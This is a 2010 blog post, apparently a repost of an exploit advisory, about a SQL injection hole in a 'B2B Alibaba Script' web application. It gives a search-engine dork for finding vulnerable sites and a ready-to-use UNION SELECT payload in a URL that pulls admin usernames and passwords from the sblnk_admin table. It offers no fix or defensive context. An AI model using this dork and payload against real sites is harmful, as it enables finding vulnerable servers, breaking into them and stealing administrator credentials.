midads

Rabu, 04 Agustus 2010

B2B Alibaba Script SQL Injection Vulnerability


Author : FormatXFormaT

Bug Type : Blind SQL Injection

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=

Dork:
allinurl:news_desc.php?id=

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=

Exploit:

http://server/news_desc.php?id=[sql]
http://server/news_desc.php?id=4+union+all+select+1,concat(username,0x3e,password),3,4,5+from+sblnk_admin--

=-==-==-==-==-==-==-==T==K==R==D==-==-==-==-==-==-==-==-==-==-==-==-=

Special Thanks: All Tkurd.com Memebers.

Related Articles :


Stumble
Delicious
Technorati
Twitter
Facebook

0 komentar:

Posting Komentar

VIDEO

ENTER-TAB1-CONTENT-HERE

RECENT POSTS

ENTER-TAB2-CONTENT-HERE

POPULAR POSTS

ENTER-TAB3-CONTENT-HERE
 

Portal Bebas Copyright © 2010 Premium Wordpress Themes | Website Templates | Blogger Template is Designed by Lasantha.